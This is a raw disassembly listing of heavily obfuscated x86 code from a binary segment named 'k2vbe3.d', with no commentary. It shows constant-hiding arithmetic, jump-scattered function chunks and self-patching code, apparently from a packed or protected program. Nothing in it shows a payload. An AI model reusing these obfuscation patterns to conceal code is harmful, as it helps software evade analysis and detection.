		xchg	ecx, [esp+0]
		pop	ecx
		add	eax, 7AC359D4h
		add	eax, ebp
		add	eax, 0CC4938F9h
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jmp	loc_456762
sub_43D823	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43D83F	proc near		; CODE XREF: sub_4467E1:loc_4467EAp
					; k2vbe3.d:00447AA7j

; FUNCTION CHUNK AT 0044A579 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0044BCE9 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	0E634E85Eh
		pop	eax
		rol	eax, 7
		jmp	loc_44A579
sub_43D83F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E971

loc_43D851:				; CODE XREF: sub_44E971-3662j
					; sub_44E971+9j ...
		call	sub_459DAF

loc_43D856:				; CODE XREF: k2vbe3.d:0044ED75j
		jno	loc_43F773
; END OF FUNCTION CHUNK	FOR sub_44E971

; =============== S U B	R O U T	I N E =======================================



sub_43D85C	proc near		; CODE XREF: sub_44D8E0+Bp

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00441FDC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004527F4 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045738E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004595DE SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	ecx
		push	0A9D845F9h
		jmp	loc_4527F4
sub_43D85C	endp


; =============== S U B	R O U T	I N E =======================================



sub_43D86B	proc near		; CODE XREF: sub_443CD9+5947p
					; k2vbe3.d:004574C3j
		xchg	esi, [esp+0]
		pop	esi
		pop	ecx
		pop	ebp
		retn
sub_43D86B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443CD9

loc_43D872:				; CODE XREF: sub_443CD9j sub_446163j ...
		mov	al, 1
		jmp	loc_449619
; END OF FUNCTION CHUNK	FOR sub_443CD9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440E71

loc_43D879:				; CODE XREF: sub_440E71:loc_44373Ej
		sub	ecx, 0F39E58A3h
		xor	ecx, 207B40B2h
		sub	eax, ecx
		pop	ecx
		jmp	loc_441286
; END OF FUNCTION CHUNK	FOR sub_440E71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F028

loc_43D88D:				; CODE XREF: sub_44F028-10376j
		jno	loc_444974
		shr	ebx, 19h
		jmp	loc_44506F
; END OF FUNCTION CHUNK	FOR sub_44F028
; ---------------------------------------------------------------------------
		mov	edx, ds:dword_441774
		mov	ebx, [edx]
		sub	ebx, eax
		mov	ecx, [ebp-4]
		push	0A1413537h
		pop	eax
		xor	eax, 0EA407FBAh
		jmp	loc_43EC67
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_55. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_43D8BA:				; CODE XREF: sub_456666+AD1j
		jmp	loc_44FE01
; END OF FUNCTION CHUNK	FOR sub_456666

; =============== S U B	R O U T	I N E =======================================



sub_43D8BF	proc near		; CODE XREF: k2vbe3.d:00445152j
					; sub_45A323-3346p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044459A SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	edx, [esp-4+arg_0]
		jmp	loc_44459A
sub_43D8BF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	eax, 0D53D974Bh
		call	sub_4553CC
		mov	ds:off_41E064, eax
		lea	eax, loc_44AC7F
		jmp	loc_441E7B
; ---------------------------------------------------------------------------

loc_43D8E6:				; CODE XREF: k2vbe3.d:0043DE5Ej
		mov	edx, eax
		pop	eax
		mov	eax, [esp]
		push	edx
		push	ecx
		push	0DBA31DC8h
		jmp	loc_43FF0B
; ---------------------------------------------------------------------------

loc_43D8F8:				; DATA XREF: sub_44C90E:loc_43C49Co
		mov	dword ptr [ebp-108h], 0Bh
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_43D902:				; CODE XREF: sub_457DCA-15F96j
		jb	loc_4469CA
		mov	eax, [ebp-104h]
		cmp	byte ptr [eax],	0
		jnz	loc_44F8BD
		jmp	loc_442014
; END OF FUNCTION CHUNK	FOR sub_457DCA
; ---------------------------------------------------------------------------

loc_43D91C:				; CODE XREF: k2vbe3.d:0045765Cj
		jz	loc_451EAD
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_43D922:				; CODE XREF: sub_43CCD0:loc_45763Fj
		rol	edx, 16h
		add	edx, 0CE41B993h
		call	sub_45B20A
		mov	[ebp-4], eax
		cmp	dword ptr [ebp-4], 0
		jz	loc_446C00
		jmp	loc_459F1A
; END OF FUNCTION CHUNK	FOR sub_43CCD0

; =============== S U B	R O U T	I N E =======================================



sub_43D942	proc near		; DATA XREF: k2vbe3.d:00446E78o

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043D7EE SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00440784 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 004432AB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A7A5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045B471 SIZE 00000005 BYTES

		push	eax
		push	edi
		mov	edi, edx
		xchg	edi, [esp+8+var_8]
		jmp	loc_45B471
sub_43D942	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_43D94E:				; CODE XREF: sub_44921C:loc_441EA0j
		or	eax, 6042A76h
		js	loc_448EE9
		popf
		jmp	loc_448EE3
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------

loc_43D960:				; CODE XREF: k2vbe3.d:0044C55Fj
		or	edx, 0F9FECA2Fh
		add	edx, 4301A1h
		push	offset loc_448017
		jmp	locret_43C9FA
; ---------------------------------------------------------------------------

loc_43D976:				; DATA XREF: sub_44791F+6o
		cmp	byte ptr [ebp-1], 0
		jz	loc_43FCDC
		mov	dword ptr [ebp-8], 1
		jmp	loc_43C3C9

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_43D98C	proc near		; CODE XREF: sub_456A5Fj

var_8		= dword	ptr -8
var_1		= byte ptr -1

; FUNCTION CHUNK AT 0043FCDC SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004427E1 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044A0AD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D527 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450BD6 SIZE 0000000E BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFF8h
		mov	[ebp+var_1], al
		cmp	[ebp+var_1], 0
		jmp	loc_44A0AD
sub_43D98C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_43D99E:				; CODE XREF: sub_43F7AC+14469j
		xor	esi, ebp

loc_43D9A0:				; CODE XREF: sub_43F7AC:loc_43E4BDj
		mov	eax, 62h
		call	sub_44ADEC
		jmp	loc_458373
; ---------------------------------------------------------------------------

loc_43D9AF:				; CODE XREF: sub_43F7AC+67ACj
					; sub_4539B3:loc_44AB73j ...
		jns	loc_4568D4
		call	sub_43DA1E
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_43D9BA:				; CODE XREF: sub_44921C-575Ej
		jmp	loc_44927B
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_43D9BF:				; CODE XREF: sub_4553CC:loc_45BD67j
		jz	loc_44DE55
		jmp	loc_44F3FD
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------

loc_43D9CA:				; CODE XREF: k2vbe3.d:004480B5j
		jl	loc_44B117

loc_43D9D0:				; CODE XREF: k2vbe3.d:0044ED8Ej
		jmp	loc_44396B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_43D9D5:				; CODE XREF: sub_4553CC-15731j
		jmp	loc_4513B9
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------
		ror	edi, 6
; START	OF FUNCTION CHUNK FOR sub_441409

loc_43D9DD:				; CODE XREF: sub_441409+132DEj
		cmp	ebx, edi
		jmp	loc_43D2E2
; END OF FUNCTION CHUNK	FOR sub_441409
; ---------------------------------------------------------------------------
		sub	edx, 0CC631F13h
		cmp	esi, ebp
		jmp	loc_452827
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441DCC

loc_43D9F1:				; CODE XREF: k2vbe3.d:loc_44B17Ej
					; sub_441DCC:loc_45187Ej
		jl	loc_4491BF
		ror	edi, 0Ch
		popf
		jmp	loc_4491B8
; END OF FUNCTION CHUNK	FOR sub_441DCC
; ---------------------------------------------------------------------------
		retn

; =============== S U B	R O U T	I N E =======================================



sub_43DA01	proc near		; CODE XREF: sub_440C94-3C2Dp
					; sub_43F5E6+3p ...

; FUNCTION CHUNK AT 004441F7 SIZE 00000005 BYTES

		push	offset loc_43ECFF
		jmp	loc_4441F7
sub_43DA01	endp


; =============== S U B	R O U T	I N E =======================================



sub_43DA0B	proc near		; CODE XREF: k2vbe3.d:00446719j
					; sub_441FEB:loc_455E64p

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 00440B5B SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044B24C SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		pop	edx
		mov	eax, [esp-8+arg_4]
		push	edx
		call	sub_4599AA
		jmp	loc_44B24C
sub_43DA0B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43DA1E	proc near		; CODE XREF: sub_43F7AC-1DF7p
					; k2vbe3.d:0043E0EFj

; FUNCTION CHUNK AT 0043E44F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043FE3B SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044099C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440AE6 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00443D4E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446346 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044658F SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004482A3 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004492AF SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004495F0 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004499F8 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044C93A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CB7B SIZE 00000022 BYTES
; FUNCTION CHUNK AT 004544BE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454A3E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004568BF SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00457093 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045BCD9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BD6C SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	ebx
		push	77CAF72Ch
		pop	ebx
		rol	ebx, 16h
		add	ebx, 22FB9BEDh
		jmp	loc_43FE3B
sub_43DA1E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	edx
		test	edi, esi
		jmp	loc_4518A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_43DA3F:				; CODE XREF: sub_4553CC-8FC4j
		cdq
		or	eax, edx
		jmp	loc_43EF2E
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B4EE

loc_43DA47:				; CODE XREF: sub_45B4EE:loc_458AE1j
		pop	edi
		or	edx, ebx
		push	esi
		push	0DAD9031Eh
		pop	esi

loc_43DA51:				; CODE XREF: k2vbe3.d:loc_43E4C8j
		or	esi, 488B53Bh
		and	esi, 95B214CAh
		jmp	loc_4451D5
; END OF FUNCTION CHUNK	FOR sub_45B4EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458B9B

loc_43DA62:				; CODE XREF: sub_458B9B:loc_44AAE5j
					; sub_458B9B-2A86j
		mov	eax, [ebp-4]
		push	offset sub_443BDF
		jmp	nullsub_515
; END OF FUNCTION CHUNK	FOR sub_458B9B
; ---------------------------------------------------------------------------

loc_43DA6F:				; CODE XREF: k2vbe3.d:0044AC6Fj
		rol	eax, 0Ah
		or	eax, 0E0793EE0h
		test	eax, 1000h
		jmp	loc_43E85C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F028

loc_43DA83:				; CODE XREF: sub_44F028:loc_440805j
		mov	[ebp+0], eax
		and	ebp, 85C6012Dh
		jmp	loc_43FD8F
; END OF FUNCTION CHUNK	FOR sub_44F028
; ---------------------------------------------------------------------------
		jnz	loc_44D438
		jmp	sub_451F91
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450983

loc_43DA9C:				; CODE XREF: sub_450983-E23j
		pop	ecx
		jge	loc_44131C
		mov	esi, [edx]
		or	esi, 0BE9F5364h
; END OF FUNCTION CHUNK	FOR sub_450983
; START	OF FUNCTION CHUNK FOR sub_44DF16

loc_43DAAB:				; CODE XREF: sub_450983:loc_4436DFj
					; sub_44DF16+8j ...
		jmp	loc_44B203
; END OF FUNCTION CHUNK	FOR sub_44DF16
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450983

loc_43DAB0:				; CODE XREF: k2vbe3.d:00442142j
					; sub_450983+A4F2j
		pop	ecx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_450983
; ---------------------------------------------------------------------------

loc_43DAB3:				; CODE XREF: k2vbe3.d:0045399Cj
		jmp	loc_4480AF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_43DAB8:				; CODE XREF: sub_445124-5B02j
		jmp	loc_44FC3B
; END OF FUNCTION CHUNK	FOR sub_445124
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4563FD

loc_43DABD:				; CODE XREF: sub_4563FD-BBCj
		adc	eax, 0D94B494Fh
		push	6AFA9B34h

loc_43DAC8:				; CODE XREF: sub_440CEA:loc_453D2Cj
		call	sub_448F78
		retn
; END OF FUNCTION CHUNK	FOR sub_4563FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440CEA

loc_43DACE:				; CODE XREF: sub_440CEA+2j
		call	sub_453FF1
		test	al, al
		jmp	loc_4507DE
; END OF FUNCTION CHUNK	FOR sub_440CEA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_391. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_43DADB	proc near		; CODE XREF: k2vbe3.d:0045A553j
					; DATA XREF: k2vbe3.d:loc_43DCF4o

; FUNCTION CHUNK AT 00446D93 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		jmp	loc_446D93
sub_43DADB	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_28. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F26C

loc_43DAE4:				; CODE XREF: sub_43F26C-1EB7j
		jmp	nullsub_50
; END OF FUNCTION CHUNK	FOR sub_43F26C
; ---------------------------------------------------------------------------
		adc	ebp, edx
		sbb	eax, 44222F54h
		jmp	sub_44F3EE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_384. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_43DAF7:				; CODE XREF: sub_443FC1-A0Aj
		jmp	loc_44AB7E
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------

loc_43DAFC:				; CODE XREF: k2vbe3.d:loc_456736j
		rol	ecx, 4
		add	ecx, 5BBE2E7Ch
		xchg	ecx, [esp]
		jmp	loc_443898
; ---------------------------------------------------------------------------

locret_43DB0D:				; CODE XREF: k2vbe3.d:loc_43FA9Dj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445EB0

loc_43DB0E:				; CODE XREF: sub_445EB0j
		call	sub_43FDA2
		push	ecx
		mov	ecx, [esp+4+arg_8]
		push	offset sub_44D3AB
		jmp	loc_43E800
; END OF FUNCTION CHUNK	FOR sub_445EB0
; ---------------------------------------------------------------------------

loc_43DB22:				; CODE XREF: k2vbe3.d:0043D7C3j
		push	38144554h
		pop	eax
		or	eax, 0B9596936h
		rol	eax, 0Ch
		xor	eax, 0D6D76BC5h
		call	sub_44ADEC
		jmp	loc_459524
; ---------------------------------------------------------------------------
		jmp	loc_44EFC3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_43DB46:				; CODE XREF: sub_457D4B:loc_449B80j
		jnb	loc_44F5D9
		jmp	loc_4498A6
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------

loc_43DB51:				; DATA XREF: sub_44DD31:loc_43F22Eo
		add	ecx, 0A843BA28h
		mov	[ecx], eax
		pop	ecx
; START	OF FUNCTION CHUNK FOR sub_4426DF

loc_43DB5A:				; CODE XREF: k2vbe3.d:0043F72Fj
					; sub_4426DF:loc_4426EDj
		push	edx
		jmp	loc_4490A0
; END OF FUNCTION CHUNK	FOR sub_4426DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452092

loc_43DB60:				; CODE XREF: sub_452092:loc_43D1ADj
		jns	loc_455ED2

loc_43DB66:				; CODE XREF: sub_43FCA0+Bj
		jmp	loc_448047
; END OF FUNCTION CHUNK	FOR sub_452092
; ---------------------------------------------------------------------------
		and	ebx, 7E428269h
		jmp	loc_455ECB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4582DD

loc_43DB76:				; CODE XREF: sub_4582DD:loc_4595E8j
		shr	esi, 0Fh
		jb	loc_4576D3
		and	eax, edx
		and	edx, 1BBC05DDh
		test	ebp, 0E57D3402h
		jmp	loc_45B264
; END OF FUNCTION CHUNK	FOR sub_4582DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C1BD

loc_43DB92:				; CODE XREF: sub_44C1BD-B029j
		sub	ebx, ecx
		and	ebx, 8113E66Fh
		or	ebp, 78690BEAh

loc_43DBA0:				; CODE XREF: sub_44C1BD:loc_441189j
		call	sub_4420B5
; END OF FUNCTION CHUNK	FOR sub_44C1BD

; =============== S U B	R O U T	I N E =======================================



sub_43DBA5	proc near		; CODE XREF: sub_449774-B898j
		push	ebx
		xor	edx, 26DD65C1h
		mov	[edi], ecx
		mov	ebp, 67EA03F8h
sub_43DBA5	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_449774

loc_43DBB3:				; CODE XREF: sub_449774:loc_43DED3j
		sub	edi, 0B7168072h
		jmp	loc_4515F1
; END OF FUNCTION CHUNK	FOR sub_449774
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453FF1

loc_43DBBE:				; CODE XREF: sub_453FF1:loc_440753j
		jz	loc_444AD6
		jmp	loc_45089E
; END OF FUNCTION CHUNK	FOR sub_453FF1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451EB7

loc_43DBC9:				; CODE XREF: sub_451EB7:loc_45B1A7j
					; DATA XREF: sub_44D345-964Ao
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0CFh
		push	offset sub_446163
		jmp	nullsub_412
; END OF FUNCTION CHUNK	FOR sub_451EB7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_43DBD9:				; CODE XREF: sub_44469A:loc_448756j
		and	ebx, 9D015787h
		test	ebx, 100h
		jmp	loc_452F1C
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EB59

loc_43DBEA:				; CODE XREF: sub_44EB59+1Cj
		add	ebx, 3A37E195h
		xchg	ebx, [esp+0]
		jmp	sub_448D3A
; END OF FUNCTION CHUNK	FOR sub_44EB59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E542

loc_43DBF8:				; CODE XREF: sub_44E542+465Cj
		xchg	ecx, [esp+0]
		push	0
		push	10h
		mov	eax, [ebp+8]
		jmp	loc_44C4C6
; END OF FUNCTION CHUNK	FOR sub_44E542
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_43DC07:				; CODE XREF: sub_45A323-19D91j
		adc	edi, 0CF962B12h

loc_43DC0D:				; CODE XREF: sub_44A20D+Ej
					; sub_45A323-AA0Fj ...
		jmp	loc_43E5D3
; ---------------------------------------------------------------------------

loc_43DC12:				; CODE XREF: sub_45A323:loc_43C8B4j
					; sub_45A323-C85j
		push	offset sub_453533
		jmp	loc_45675D
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45616B

loc_43DC1C:				; CODE XREF: sub_45616B+9j
		pop	eax
		rol	eax, 1Dh
		push	offset loc_44970A
		jmp	nullsub_333
; END OF FUNCTION CHUNK	FOR sub_45616B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F34C

loc_43DC2A:				; CODE XREF: sub_43F34C+4B9Fj
		add	eax, 0E8453B3Bh
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_459761
		jmp	loc_44DEE9
; END OF FUNCTION CHUNK	FOR sub_43F34C
; ---------------------------------------------------------------------------
		mov	ds:off_41E11C, eax
		lea	eax, sub_458951
		mov	byte ptr [eax],	0C3h
		jmp	loc_457043
; ---------------------------------------------------------------------------
		call	nullsub_2
		jmp	ds:dword_41E120
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		push	offset sub_44C579
		jmp	locret_453963
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F70D

loc_43DC6A:				; CODE XREF: sub_44F70D:loc_44B470j
		xor	eax, 3F3078EBh
		add	edx, eax
		pop	eax
		mov	edx, [edx]
		push	offset loc_4421E5
		jmp	nullsub_94
; END OF FUNCTION CHUNK	FOR sub_44F70D
; ---------------------------------------------------------------------------
		xor	ecx, 4AC7333Dh
		cmp	ecx, edx
		jmp	loc_443C7B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D16B

loc_43DC8C:				; CODE XREF: sub_44D16B:loc_448CB7j
		xchg	ecx, [esp+10h+var_10]
		call	eax
		push	edi
		push	0E94446EBh
		pop	edi
		jmp	loc_449F3C
; END OF FUNCTION CHUNK	FOR sub_44D16B
; ---------------------------------------------------------------------------

loc_43DC9D:				; CODE XREF: k2vbe3.d:00447378j
		test	esi, ebp
		jmp	loc_448DCE
; ---------------------------------------------------------------------------

loc_43DCA4:				; CODE XREF: k2vbe3.d:0044DD68j
		pushf
; START	OF FUNCTION CHUNK FOR sub_4507E3

loc_43DCA5:				; CODE XREF: sub_4507E3:loc_44DD53j
		or	edx, 0E51697B1h
		add	edx, 0CE121Eh
		xchg	edx, [esp+0]
		jmp	loc_43E101
; END OF FUNCTION CHUNK	FOR sub_4507E3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_43DCB9:				; CODE XREF: sub_43DFE1:loc_44608Bj
		xchg	edx, [esp-4+arg_0]
		mov	ebp, eax
		xchg	ebp, [esp-4+arg_0]
		push	eax
		push	197D70D4h
		pop	eax
		rol	eax, 0Ch
		jmp	loc_456550
; END OF FUNCTION CHUNK	FOR sub_43DFE1

; =============== S U B	R O U T	I N E =======================================



sub_43DCD0	proc near		; CODE XREF: k2vbe3.d:loc_43E123p
					; k2vbe3.d:0043FB33j

arg_0		= dword	ptr  4

		xchg	edi, [esp+0]
		pop	edi
		push	839CC716h
		pop	eax
		or	eax, 0C18FE821h
		xor	eax, 763A24A4h
		add	eax, 4A9F2BE1h
		xchg	eax, [esp-4+arg_0]
		jmp	nullsub_492
sub_43DCD0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43DCF4:				; CODE XREF: k2vbe3.d:loc_441718j
		push	offset sub_43DADB
		jmp	loc_43EC6D
; ---------------------------------------------------------------------------
		mov	edx, [eax]
		jmp	sub_45429A
; ---------------------------------------------------------------------------
		or	esi, 0C2A95F0Ah
		jmp	loc_45A08B
; ---------------------------------------------------------------------------

loc_43DD10:				; DATA XREF: sub_44E542:loc_44A3ABo
		xchg	esi, [esp]
		call	sub_44A7C2
		mov	eax, 64A3F24h
		call	sub_43C82E
		push	offset sub_457412
		jmp	loc_456BD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45101A

loc_43DD2C:				; CODE XREF: sub_45101A:loc_45764Fj
		jp	loc_452210
		mov	ecx, ebp
		push	ebp
		jmp	loc_448292
; END OF FUNCTION CHUNK	FOR sub_45101A

; =============== S U B	R O U T	I N E =======================================



sub_43DD3A	proc near		; DATA XREF: sub_459DA3:loc_4515C3o
		call	sub_4436CE
		push	offset loc_44F163
		jmp	nullsub_344
sub_43DD3A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456C15

loc_43DD49:				; CODE XREF: sub_456C15-1A1B6j
		jz	loc_43E54C
		jmp	loc_442B82
; END OF FUNCTION CHUNK	FOR sub_456C15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_43DD54:				; CODE XREF: sub_44C90E-FBEDj
		jnz	loc_443349
; END OF FUNCTION CHUNK	FOR sub_44C90E
; START	OF FUNCTION CHUNK FOR sub_445FE0

loc_43DD5A:				; CODE XREF: sub_445FE0+10j
		jmp	loc_45953E
; END OF FUNCTION CHUNK	FOR sub_445FE0
; ---------------------------------------------------------------------------
		adc	edx, esi
		or	esi, eax
		jmp	loc_44333E
; ---------------------------------------------------------------------------

loc_43DD68:				; CODE XREF: k2vbe3.d:0045B254j
		shl	ecx, 15h
		pop	edi
		jmp	loc_4587E3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440EE3

loc_43DD71:				; CODE XREF: sub_440EE3:loc_458009j
		jl	loc_452A3E

loc_43DD77:				; CODE XREF: sub_4426DF+126D6j
		jmp	loc_445476
; END OF FUNCTION CHUNK	FOR sub_440EE3
; ---------------------------------------------------------------------------
		cmp	ebp, esi
		jmp	loc_450593
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441D41

loc_43DD83:				; CODE XREF: sub_441D41:loc_44F500j
					; sub_441D41+14C3Aj
		push	61AE9C24h
		pop	eax
		rol	eax, 1Ch
		add	eax, 627C072Eh
		rol	eax, 0Ah
		jmp	loc_44F99F
; END OF FUNCTION CHUNK	FOR sub_441D41
; ---------------------------------------------------------------------------

locret_43DD9A:				; CODE XREF: k2vbe3.d:0044DB38j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455C7A

loc_43DD9B:				; CODE XREF: sub_455C7A-871j
		jmp	loc_443278
; END OF FUNCTION CHUNK	FOR sub_455C7A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_194. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_43DDA1	proc near		; CODE XREF: k2vbe3.d:loc_448FA6j
					; sub_457DCA-8466p ...

; FUNCTION CHUNK AT 004406F6 SIZE 00000011 BYTES

		xchg	edx, [esp+0]
		pop	edx
		add	eax, ebp
		add	eax, 1688552Ch
		mov	eax, [eax]
		call	sub_4534C2

loc_43DDB4:				; CODE XREF: k2vbe3.d:0045C2DBj
		jmp	loc_4406F6
sub_43DDA1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43DDB9:				; CODE XREF: k2vbe3.d:00459457j
		test	eax, edi
		jmp	loc_4511F1
; ---------------------------------------------------------------------------

loc_43DDC0:				; DATA XREF: k2vbe3.d:0044842Bo
		push	eax
		mov	eax, [ebp-18h]
		shl	eax, 2
		cdq
		jo	loc_43C21D
		jmp	loc_44ADF6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AB7E

loc_43DDD3:				; CODE XREF: sub_45AB7E:loc_453E8Aj
		jge	loc_451C6E
; END OF FUNCTION CHUNK	FOR sub_45AB7E
; START	OF FUNCTION CHUNK FOR sub_43CCB3

loc_43DDD9:				; CODE XREF: sub_43CCB3+27A2j
		jmp	loc_45A33B
; END OF FUNCTION CHUNK	FOR sub_43CCB3
; ---------------------------------------------------------------------------
		mov	[esi], ecx
		jmp	loc_451C6D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F1C4

loc_43DDE5:				; CODE XREF: sub_44F1C4:loc_45B2C9j
		jz	loc_45117D
; END OF FUNCTION CHUNK	FOR sub_44F1C4
; START	OF FUNCTION CHUNK FOR sub_456541

loc_43DDEB:				; CODE XREF: sub_456541-AA91j
		jmp	loc_4546AD
; END OF FUNCTION CHUNK	FOR sub_456541
; ---------------------------------------------------------------------------
		xor	eax, 0FB463E9Bh
